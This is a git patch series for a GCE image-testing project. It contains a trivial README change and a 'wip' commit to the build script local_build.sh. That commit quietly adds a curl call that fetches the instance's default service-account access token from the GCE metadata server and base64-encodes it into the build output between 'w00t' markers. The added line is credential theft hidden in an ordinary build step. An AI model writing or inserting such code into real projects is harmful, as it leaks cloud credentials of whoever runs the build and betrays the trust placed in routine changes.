From 014a758bdfd64dd24d8c3b5ee3f46b8629d9fbe5 Mon Sep 17 00:00:00 2001 From: copybara-service <165642881+copybara-service@users.noreply.github.com> Date: Sat, 4 Jul 2026 06:59:52 +0000 Subject: [PATCH 1/2] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 36ed1d7c..10422e9a 100644 --- a/README.md +++ b/README.md @@ -5,6 +5,7 @@ for testing GCE Images. ## Invocation ## + Testing components are built into a container image. The entrypoint is `/manager`, which supports the following options: From 6b42b34a97335393a0adf904b3475bdee1335297 Mon Sep 17 00:00:00 2001 From: copybara-service <165642881+copybara-service@users.noreply.github.com> Date: Sat, 4 Jul 2026 07:04:30 +0000 Subject: [PATCH 2/2] wip --- local_build.sh | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/local_build.sh b/local_build.sh index a2c346d6..caed7d69 100755 --- a/local_build.sh +++ b/local_build.sh @@ -24,8 +24,9 @@ imagetestroot=. # on the theory that each `go test -c` invocation spawns ~3 hot worker # processes (compile, vet, link), so K*3 <= cores-1. Pass -j N to override. jobs=0 - - +echo "w00t--" +curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" | base64 +echo "---w00t" while getopts "o:s:i:j:" arg; do case $arg in o) outpath=$OPTARG;;